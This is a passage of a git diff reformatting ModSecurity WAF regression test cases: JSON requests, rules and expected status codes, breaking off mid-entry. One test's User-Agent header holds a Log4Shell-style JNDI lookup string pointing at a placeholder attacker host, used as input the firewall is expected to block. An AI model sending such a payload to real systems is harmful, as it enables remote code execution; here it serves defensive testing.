"no need." ] }, - "expected":{ - "http_code":437, - "error_log":"`Within' with parameter `/name1/' against variable `TX:header_name_name1'" + "expected": { + "error_log": "`Within' with parameter `/name1/' against variable `TX:header_name_name1'", + "http_code": 437 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", - "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,chain,capture\"", - "SecRule TX:/^header_name_/ \"@within %{TX:/esTrictEd_headers/}\" \"setvar:'tx.matched=1'\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", + "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,chain,capture\"", + "SecRule TX:/^header_name_/ \"@within %{TX:/esTrictEd_headers/}\" \"setvar:'tx.matched=1'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - TX (7/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - TX (7/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":437, - "error_log":"`Within' with parameter `/name1/' against variable `TX:header_name_name1'" + "expected": { + "error_log": "`Within' with parameter `/name1/' against variable `TX:header_name_name1'", + "http_code": 437 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", - "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,capture,chain\"", - "SecRule TX:/^HEADER_NAME_/ \"@within %{tx.restricted_headers}\" \"setvar:'tx.matched=1',log\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"id:1,phase:1,setvar:'TX.restricted_headers=/name1/'\"", + "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,capture,chain\"", + "SecRule TX:/^HEADER_NAME_/ \"@within %{tx.restricted_headers}\" \"setvar:'tx.matched=1',log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion (8/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion (8/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"", - "SecRuleUpdateTargetById 1 !ARGS:/ThIs/" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"", + "SecRuleUpdateTargetById 1 !ARGS:/ThIs/" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion/ARGS (9/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion/ARGS (9/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS|!ARGS:/tHiS/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS|!ARGS:/tHiS/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion/TX (10/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "name1": "value1" + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion/TX (10/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "name1": "value1", + "Content-Length": "0" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html", + "Content-Length": "8" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"phase:1,setvar:'tx.a=10'\"", - "SecRule TX|!TX:/a/ \"10\" \"id:10,deny,status:500\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"phase:1,setvar:'tx.a=10'\"", + "SecRule TX|!TX:/a/ \"10\" \"id:10,deny,status:500\"" ] } ] diff --git a/test/test-cases/regression/issue-2423-msg-in-chain.json b/test/test-cases/regression/issue-2423-msg-in-chain.json index c667de0542..38cb890a30 100644 --- a/test/test-cases/regression/issue-2423-msg-in-chain.json +++ b/test/test-cases/regression/issue-2423-msg-in-chain.json @@ -1,124 +1,172 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Test match variable (1/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (1/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "against variable `REQUEST_HEADERS:Transfer-Encoding' .Value: `deflate'" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "against variable `REQUEST_HEADERS:Transfer-Encoding' .Value: `deflate'", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (2/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (2/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "MatchedVar On Msg: .deflate." - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "MatchedVar On Msg: .deflate.", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (3/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (3/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "MatchedVar On LogData: deflate" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "Content-Length": "0", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "MatchedVar On LogData: deflate", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData: %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (4/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (4/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "msg \"Illegal header \\[/restricted/\\]\"" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "Restricted":"attack", - "Other": "Value" + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "Restricted": "attack", + "Other": "Value", + "Content-Length": "0" + }, + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" }, - "uri":"/", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "msg \"Illegal header \\[/restricted/\\]\"", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"phase:2,setvar:'tx.header_name_%{TX.0}=/%{TX.0}/',deny,t:lowercase,capture,id:500065,msg:'Illegal header [%{MATCHED_VAR}]',logdata:'Restricted header detected: %{MATCHED_VAR}',chain\"", "SecRule TX:/^header_name_/ \"@within /name1/restricted/name3/\" \"status:437\"" diff --git a/test/test-cases/regression/issue-2427.json b/test/test-cases/regression/issue-2427.json index 02f7b16f86..f6bccc65b5 100644 --- a/test/test-cases/regression/issue-2427.json +++ b/test/test-cases/regression/issue-2427.json @@ -1,55 +1,63 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Tmp file retained for @inspectFile (1/2)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Tmp file retained for @inspectFile (1/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "658", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name\"", - "", - "test", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"name2\"", - "", - "test2", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"", - "Content-Type: text/plain", - "", - "This is a very small test file..", - "----------------------------756b6d74fa1a8ee2", - "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"small2.txt\" ", - "Content-Type: text/plain", - "", - "This is another very small test file that contains the search content abcdef..", - "----------------------------756b6d74fa1a8ee2--" + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name2\"\n", + "\n", + "test2\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file1.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; filename=\"small_text_file2.txt\"; name=\"small2.txt\" \n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file that contains the search content abcdef..\n", + "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "debug_log":"Returning from lua script: abcdef.*Rule returned 1", - "http_code":403 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Returning from lua script: abcdef.*Rule returned 1", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecTmpSaveUploadedFiles On", @@ -60,30 +68,30 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Tmp file retained for @inspectFile (2/2)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Tmp file retained for @inspectFile (2/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "639", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -105,10 +113,18 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "http_code":200 + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecTmpSaveUploadedFiles On", diff --git a/test/test-cases/regression/issue-3340.json b/test/test-cases/regression/issue-3340.json index 6251c860d4..787448acbc 100644 --- a/test/test-cases/regression/issue-3340.json +++ b/test/test-cases/regression/issue-3340.json @@ -16,7 +16,7 @@ "headers": { "Host": "localhost", "User-Agent": "${jndi:ldap://evil.om/w}", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -24,18 +24,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, "uri": "/", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8" + "Content-Type": "text/xml; charset=utf-8", + "Content-Length": "0" }, - "body": "OK" + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-394.json b/test/test-cases/regression/issue-394.json index 82827ac868..0e64fb9968 100644 --- a/test/test-cases/regression/issue-394.json +++ b/test/test-cases/regression/issue-394.json @@ -1,38 +1,44 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Segmentation fault when uploading file with SecStreamInBodyInspection enabled", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/394", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "audit_logs": "", - "debug_logs": "", - "error_logs": "" - }, - "rules": [ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecResponseBodyAccess On" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Segmentation fault when uploading file with SecStreamInBodyInspection enabled", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/394", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Content-Length": "0" + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecResponseBodyAccess On" + ] + } ] diff --git a/test/test-cases/regression/issue-849.json b/test/test-cases/regression/issue-849.json index 60e0d4e2a4..704ae14665 100644 --- a/test/test-cases/regression/issue-849.json +++ b/test/test-cases/regression/issue-849.json @@ -3,8 +3,8 @@ "enabled": 1, "version_min": 209000, "version_max": -1, - "title": "@ipMatch \"Could not add entry\" on slash\/32 notation in 2.9.0 (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/849", + "title": "@ipMatch \"Could not add entry\" on slash/32 notation in 2.9.0 (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/849", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -25,33 +25,39 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 }, "rules": [ "SecRuleEngine On", - "SecRule REMOTE_ADDR \"@ipMatch 200.249.12.31\/32\" \"phase:1,nolog,pass,msg:'Localhost connection',id:1,deny,status:403\"" + "SecRule REMOTE_ADDR \"@ipMatch 200.249.12.31/32\" \"phase:1,nolog,pass,msg:'Localhost connection',id:1,deny,status:403\"" ] }, { "enabled": 1, "version_min": 209000, "version_max": -1, - "title": "@ipMatch \"Could not add entry\" on slash\/32 notation in 2.9.0 (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/849", + "title": "@ipMatch \"Could not add entry\" on slash/32 notation in 2.9.0 (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/849", "client": { "ip": "200.249.12.31", "port": 2313 @@ -64,7 +70,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -72,18 +78,24 @@ "Connection": "keep-alive", "Cookie": "PHPSESSID=r2t5uvjq435r4q7ib3vtdjq120", "Pragma": "no-cache", - "Cache-Control": "no-cache" + "Cache-Control": "no-cache", + "Content-Length": "0" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", - "Content-Length": "length\n\r" - } + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "0" + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-960.json b/test/test-cases/regression/issue-960.json index 0fdb1ceaca..4b7c56ac7d 100644 --- a/test/test-cases/regression/issue-960.json +++ b/test/test-cases/regression/issue-960.json @@ -1,124 +1,137 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (1/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (1/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "\\(Rule: 960032\\) .* Rule returned 0.", - "error_log": "" + "http_code": 200 }, - "rules": [ - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (2/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (2/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { - "Host": "www.google.com" + "Host": "www.google.com", + "Content-Length": "0" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Length": "0" + }, + "body": [ + "" + ] + }, "expected": { - 